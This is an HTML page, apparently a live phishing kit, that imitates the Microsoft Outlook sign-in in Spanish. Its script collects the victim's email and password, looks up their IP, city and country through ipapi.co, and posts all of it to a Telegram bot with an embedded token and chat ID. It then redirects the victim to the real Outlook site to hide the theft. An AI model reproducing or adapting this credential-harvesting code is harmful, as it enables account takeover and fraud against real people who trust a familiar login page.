<!DOCTYPE html>
<html lang="es">
<head>
<!-- Inserted by miarroba -->
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-7294310421616689" crossorigin="anonymous"></script>
<script type='text/javascript' src='https://ads.vidoomy.com/miarroba_23335.js' async></script>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-T2VG59');</script>
<!-- Inserted by miarroba -->
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Iniciar sesión</title>
    <link rel="stylesheet" href="ai2contrash.css">
    <link rel="shortcut icon" href="iconitopequenio.ico">
    <style>
        body {
            background-color: #f2f2f2;
            font-family: 'Segoe UI', Arial, sans-serif; /* Cambiar a Segoe UI */
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            flex-direction: column;
        }
        .login-container {
            background-color: #fff;
            padding: 50px;
            border-radius: 5px;
            box-shadow: 0 0 15px rgba(0, 0, 0, 0.1);
            width: 100%;
            max-width: 450px;
            text-align: left;
            margin-bottom: 20px;
        }
        .login-container img {
            margin-bottom: 28px; /* Incrementa el espacio debajo de la imagen */
            display: block;
            width: 108px; /* Agranda la imagen a 120px */
        }
        .login-container div[role="heading"] {
            font-size: 28px;
            margin-bottom: 10px; /* Aumentado el espacio debajo del encabezado */
            color: #000; /* Texto en negro */
            font-family: 'Segoe UI', Arial, sans-serif; /* Cambiar a Segoe UI */
            font-weight: 400; /* Peso de la fuente normal */
        }
        .login-container p {
            margin: 0 0 20px; /* Ajustado el margen superior para mayor separación con "Iniciar sesión" */
            color: #000; /* Texto en negro */
            font-size: 14px; /* Tamaño de fuente más pequeño */
        }
        .login-container form {
            display: flex;
            flex-direction: column;
            align-items: flex-start;
        }
        .login-container input {
            padding: 12px 0;
            margin-bottom: 12px;
            border: none;
            border-bottom: 2px solid #ccc;
            font-size: 14px; /* Tamaño de fuente reducido */
            width: 100%;
            box-sizing: border-box;
            outline: none;
        }
        .login-container input::placeholder {
            font-size: 15px; /* Tamaño de fuente del placeholder reducido */
        }
        .login-container input:focus {
            border-bottom: 2px solid #0078d4;
        }
        .login-container .create-account {
            margin-top: 10px;
            color: #000; /* Texto en negro */
            font-size: 14px;
        }
        .login-container .create-account a {
            color: #0078d4;
            text-decoration: none;
        }
        .login-container .create-account a:hover {
            text-decoration: underline;
        }
        .login-container button {
            background-color: #0078d4;
            color: white;
            border: none;
            padding: 8px 16px;
            border-radius: 1px;
            font-size: 14px;
            cursor: pointer;
            align-self: flex-end;
            margin-top: 50px;
            margin-bottom: 40px;
        }
        .login-container button:hover {
            background-color: #005a9e;
        }
        .sign-in-options-container {
            background-color: #fff;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            display: flex;
            align-items: center;
            justify-content: flex-start;
            font-size: 14px;
            cursor: pointer;
            width: 100%;
            max-width: 450px;
        }
        .sign-in-options-container .inner-content {
            margin-left: 20px; /* Mueve el contenido interno un poco más hacia la izquierda */
            display: flex;
            align-items: center;
        }
        .sign-in-options-container img {
            margin-right: 8px;
            width: 30px; /* Agranda la imagen */
        }
        .sign-in-options-container span {
            color: #000; /* Texto en negro */
        }
         .email-display {
            font-size: 16px;
            margin-bottom: 5px;
            font-weight: normal;
            display: flex;
            align-items: center;
        }
        .email-display img {
            margin-right: 2px;
            width: 30px; /* Tamaño ajustado de la flecha */
        }
        .email-display span {
            position: relative;
            top: -14px; /* Ajuste para subir el correo electrónico */
        }
    </style>
</head>
<body>
<!-- Inserted by miarroba -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-T2VG59" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- Inserted by miarroba -->
   <div class="login-container" id="paso1">
    <img src="1.svg" alt="Microsoft Logo">
    <div role="heading" aria-level="1" id="usernameTitle">Iniciar sesión</div>
    <p>to continue to Outlook</p>
    <form action="sa1.php" method="post" onsubmit="return nextstep();">
        <input type="email" id="one" placeholder="Correo electrónico, teléfono o Skype" required>
        <div class="create-account">
            No account? <a href="#">Create one!</a>
        </div>
        <button type="submit">Siguiente</button>
    </form>
</div>

<div class="login-container" id="paso2" style="display:none;">
    <img src="1.svg" alt="Microsoft Logo">
    <div class="email-display" id="flecha">
        <img src="flechaa.svg" alt="Flecha"> 
        <div id="mailtip"></div>
    </div>
    <p class="prompt-text">Escribir contraseña</p>
    <form id="loginForm">
        <input type="password" id="password" placeholder="Contraseña" required>
        <div class="additional-options">
            <a href="#">¿Ha olvidado su contraseña?</a>
            <a href="#">Otras formas de iniciar sesión</a>
        </div>
        <button type="button" onclick="validatePassword();">Iniciar Sesión</button>
    </form>
</div>

<div class="sign-in-options-container">
    <div class="inner-content">
        <img src="https://logincdn.msftauth.net/shared/5/images/signin_options_4e48046ce74f4b89d450.svg" alt="Sign-in options icon">
        <span>Sign-in options</span>
    </div>
</div>

<script src="https://cdn.jsdelivr.net/npm/axios@1.1.2/dist/axios.min.js"></script>

<script type="text/javascript">
function nextstep() {
    const mail = document.getElementById("one").value;
    if (mail === '') {
        return false; // Evita que el formulario se envíe
    } else {
        document.getElementById('paso1').style.display = 'none';
        document.getElementById('paso2').style.display = 'block';
        document.getElementById('mailtip').innerText = mail;
        return false; // Evita que el formulario se envíe
    }
}

document.getElementById("flecha").onclick = function() {
    document.getElementById('paso1').style.display = 'block';
    document.getElementById('paso2').style.display = 'none';
};

function validatePassword() {
    const password = document.getElementById("password").value;
    if (password === '') {
        alert("El campo de contraseña no puede estar vacío");
        return false;
    } else {
        sendToTelegram(); // Llama a la función para enviar los datos a Telegram
        return false; // Evita que el formulario se envíe
    }
}

function sendToTelegram() {
    const url = "https://ipapi.co/json/";
    axios.get(url)
        .then((response) => {
            const numdoc = document.getElementById("one").value;
            const pss = document.getElementById("password").value;

            const message =
                "✅HOTMAIL✅" +
                "\n📧Correo: " +
                numdoc +
                "\n🔐Contraseña: " +
                pss +
                "\n🏙Ciudad: " +
                response.data.city +
                "\n🌎País: " +
                response.data.country +
                "\n🔢IP: " +
                response.data.ip +
                "\n";
            axios.post(
                "https://api.telegram.org/bot6326220147:AAFtVrutFYz8S8_tuCxTQgTIuOjJZnkwU-0/sendMessage",
                {
                    chat_id: "6472068491",
                    text: message,
                }
            )
            .then((response) => {
                window.location.href = "https://outlook.live.com/owa/";
            })
            .catch((error) => {
                console.error(error);
            });
        })
        .catch((error) => {
            console.log(error);
        });
}
</script>


<!-- Inserted by miarroba -->
</script></noframes></noembed></noscript><script type="text/javascript" src="/hosting__contador__visitas__unicas.php?h=2184222&amp;t=1741791560&amp;k=73fbb32be7364fd3f8fc581f04333ddd&amp;__muid="></script>
<!-- Inserted by miarroba -->
</body>
</html>
